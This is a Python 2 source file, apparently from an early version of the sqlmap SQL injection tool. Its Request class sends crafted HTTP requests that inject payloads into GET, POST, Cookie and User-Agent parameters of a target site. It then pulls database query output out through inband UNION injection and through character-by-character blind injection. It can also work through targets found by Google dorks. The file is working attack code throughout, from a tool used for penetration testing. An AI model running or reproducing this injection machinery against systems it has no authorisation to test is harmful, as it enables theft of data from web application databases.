#!/usr/bin/env python


import logging
import md5
import re
import socket
import urllib2
import time

from sqlmap.resume import Resume


class Request(Resume):
    """
    This class defines methods used to perform HTTP requests

    @author: Bernardo Damele
    """

    def __init__(self):
        socket.setdefaulttimeout(15)
        self.logger = logging.getLogger("sqlmapLog")


    def urlEncode(self, params):
        """
        This method encodes and returns the url parameters special
        characters in their corresponding HTML hexadecimal value
        """

        charList = {
                     " ": "%20", "!": "%21", '"': "%22", "#": "%23",
                     "$": "%24", "'": "%27", "(": "%28", ")": "%29",
                     "*": "%2A", "+": "%2B", ",": "%2C", "-": "%2D",
                     ".": "%2E", "/": "%2F", ":": "%3A", ";": "%3B",
                     "<": "%3C", ">": "%3E", "?": "%3F", "@": "%40",
                     "[": "%5B", "\\": "%5C", "]": "%5D", "^": "%5E",
                     "_": "%5F", "`": "%60", "{": "%7B", "|": "%7C",
                     "}": "%7D", "~": "%7E",
                     # "%": "%25", "&": "%26", "=": "%3D"
                   }

        for char, encChar in charList.items():
            params = params.replace(char, encChar)

        return params


    def getPage(self, **kwargs):
        """
        This method connects to the target url or proxy and returns
        the target url page content
        """

        url    = kwargs.get('url',    self.args.url).replace(" ", "%20")
        get    = kwargs.get('get',    None)
        post   = kwargs.get('post',   None)
        cookie = kwargs.get('cookie', None)
        ua     = kwargs.get('ua',     None)
        msg    = kwargs.get('msg',    None)
        direct = kwargs.get('direct', False)
        data   = None

        if not msg:
            msg = "request: %s" % url

        self.logger.debug(msg)

        headers = self.forgeHeaders(cookie, ua)
        self.args.opener.addheaders = headers

        if direct:
            if "?" in url:
                url, params = url.split("?")
                params = self.urlEncode(params)
                url = "%s?%s" % (url, params)
        elif self.args.httpMethod == "GET":
            if self.args.parameters.has_key("GET") and not get:
                get = self.args.parameters["GET"]

            if get:
                get = self.urlEncode(get)
                url = "%s?%s" % (url, get)
        elif self.args.httpMethod == "POST":
            if self.args.parameters.has_key("POST") and not post:
                post = self.args.parameters["POST"]

            post = self.urlEncode(post)

        try:
            conn = self.args.opener.open(url, post)
            page = conn.read()
        except urllib2.HTTPError, e:
            if e.code == 401:
                raise Exception, "not authorized"
            else:
                page = e.read()
        except urllib2.URLError, e:
            warnMsg = "unable to connect to the target url"

            if self.args.googleDork:
                warnMsg += ", skipping to next url"
                self.logger.warn(warnMsg)

                return None
            else:
                warnMsg += " or proxy"
                raise Exception, warnMsg

        self.parsePage(page)

        return page


    def queryPage(self, value=None, place=None, content=False):
        """
        This method calls a function to get the target url page content
        and returns its page MD5 hash or a boolean value in case of
        string match check ('--string' command line parameter)
        """

        get    = None
        post   = None
        cookie = None
        ua     = None
        msg    = "request: %s" % self.args.url

        if not place:
            place = self.args.injPlace

        if self.args.parameters.has_key("GET"):
            if place == "GET":
                get = value
            else:
                get = self.args.parameters["GET"]

            msg += "?%s" % get

        if self.args.parameters.has_key("POST"):
            if place == "POST":
                post = value
            else:
                post = self.args.parameters["POST"]

            msg += ", POST: %s" % post

        if self.args.parameters.has_key("Cookie"):
            if place == "Cookie":
                cookie = value
            else:
                cookie = self.args.parameters["Cookie"]

            msg += ", Cookie: %s" % cookie

        if self.args.parameters.has_key("User-Agent"):
            if place == "User-Agent":
                ua = value
            else:
                ua = self.args.parameters["User-Agent"]

            msg += ", User-Agent: %s" % ua

        page = self.getPage(get=get, post=post, cookie=cookie, ua=ua, msg=msg)

        if content:
            return page
        elif self.args.string:
            if self.args.string in page:
                return True
            else:
                return False
        else:
            return md5.new(page).hexdigest()


    def getValue(self, expression, blind=True, inband=True):
        """
        This method tries to retrieve the output of a SQL statement
        through inband SQL injection (if selected) and blind SQL
        injection method
        """

        value = None

        logMsg = "query: %s" % expression
        self.logger.info(logMsg)

        if inband and self.args.unionUse and self.args.fingerprint:
            value = self.getInband(expression)

        if blind and not value:
            value = self.getBlind(expression)

        return value


    def getInband(self, expression):
        """
        This method retrieves the output of a SQL statement taking
        advantage of an inband SQL injection vulnerability on the
        afftected url parameter
        """

        counter = None
        output = None
        data = []

        if self.args.resume and self.args.resumedQueries:
            if self.args.url in self.args.resumedQueries.keys():
                if expression in self.args.resumedQueries[self.args.url].keys():
                    output = self.resumeValue(expression, None)

                    if not output:
                        warnMsg  = "the resumed output is partial, sqlmap is "
                        warnMsg += "going to retrieve the query output again"
                        self.logger.info(warnMsg)

        if not output:
            output = self.unionUse(expression)

        fields = re.search("\ASELECT\s+(.*?)\s+FROM\s+", expression, re.I)

        if fields:
            fields = fields.groups()[0]
            fields = fields.split(",")
            counter = len(fields)

        if output:
            if counter:
                regExpr = '__START__(.*?)__STOP__'
                output = re.findall(regExpr, output, re.S)
                output = set(output)

                for entry in output:
                    info = []
                    entry = entry.split("__DEL__")

                    if len(entry) == 1:
                        data.append(entry[0])
                    else:
                        for value in entry:
                            info.append(value)

                        data.append(info)
            else:
                if output.startswith("__START__") and output.endswith("__STOP__"):
                    data = re.findall("__START__(.*)__STOP__", output, re.S)
                else:
                    data = output

            if len(data) == 1 and isinstance(data[0], str):
                data = data[0]

        return data


    def getBlind(self, expression):
        """
        This method retrieves the output of a SQL statement character
        by character taking advantage of a blind SQL injection
        vulnerability on the afftected url parameter. The algorithm
        used is a bisection algorithm defined in
        Blind.bisectionAlgorithm()
        """

        start = time.time()
        expressionUnescaped = self.unescape(expression)
        query = self.createQuery()
        payload = self.payload(newValue=query)

        if self.args.resume and self.args.resumedQueries:
            if self.args.url in self.args.resumedQueries.keys():
                if expression in self.args.resumedQueries[self.args.url].keys():
                    output = self.resumeValue(expression, payload)

                    if output:
                        output = output.replace("__NEWLINE__", "\n").replace("__TAB__", "\t")
                        output = output.replace("__START__", "").replace("__STOP__", "")

                        return output

        if self.args.writeFile:
            self.args.writeFile.write("[%s][%s][%s][%s][" % (self.args.url, self.args.injPlace, self.args.parameters[self.args.injPlace], expression))
            self.args.writeFile.flush()

        if self.args.eta:
            _, length, _ = self.queryLength(expression, payload)
        else:
            length = None

        count, value = self.bisectionAlgorithm(payload, expressionUnescaped, length=length)
        duration = int(time.time() - start)

        logMsg = "performed %d queries in %d seconds" % (count, duration)
        self.logger.info(logMsg)

        return value
